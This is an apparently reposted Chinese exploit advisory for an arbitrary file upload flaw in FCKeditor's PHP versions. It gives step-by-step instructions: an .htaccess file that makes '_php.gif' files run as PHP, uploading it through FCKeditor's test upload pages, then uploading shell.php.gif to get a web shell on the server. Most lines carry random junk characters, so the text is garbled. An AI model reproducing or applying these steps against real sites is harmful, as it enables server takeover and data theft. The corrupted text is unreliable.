FCKeditor所有php版本Upload上传漏洞
) D4 l. m+ J; i% A5 a. @& f6 Q作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
: R/ P! O; I/ m9 r' r减小字体 增大字体
# [5 {/ |) {1 r- E- ^8 x9 P, m[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability! b2 ^+ Q: y! {! K: r# r8 F
[+] Date: 2011
# f8 X( K0 J) J9 d$ g0 D0 A[+] Author : sinesafe.cn
1 _6 A9 ^; t" N# ~0 j/ z[+] Website : WwW.sinesafe.cn( s, |$ u5 A; t- c1 w( K
———————————————————2 O7 R* U8 P- m0 R
1.create a htaccess file:6 S, F7 l2 S3 `# C, H4 d) m* F, \
code:1 r, L( h0 {( M2 D6 G6 Y% `
<FilesMatch “_php.gif”>
" D; J/ Q% d! _ O+ SSetHandler application/x-httpd-php2 K( C4 b6 Y s* Z8 o
</FilesMatch>9 Y6 t3 T5 F0 ~1 W5 J
7 I5 U5 Q, B' i2.Now upload this htaccess with FCKeditor.1 M( [, P* ^, f' j$ y# I# p1 p
$ y/ T3 s3 a4 y. V% W, f
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
6 k5 u0 s0 H! r1 K5 F. M" Y/ J$ E$ K
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html- t {8 I, T- l1 t
7 Z3 Y2 V# w. Z& V4 Y1 O# f———————————————————————————————-! Y! w0 R0 S7 { M2 x2 W3 x6 b; {
3.Now upload shell.php.gif with FCKeditor.
+ r6 D( a9 b A4 G' }& g0 c/ p2 r4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.( G7 w3 k2 q* {% F) N
5.http://www.sinesafe.cn/anything/shell_php.gif
8 P% p' a; F8 l. c, U& e+ S: I6.Now shell is available from server. | 0 P6 |9 T4 r1 P2 t- a. `
( ^! ]6 u# K, G: J" w5 S( Q4 Q4 D3 J3 P2 f' b" C% D
|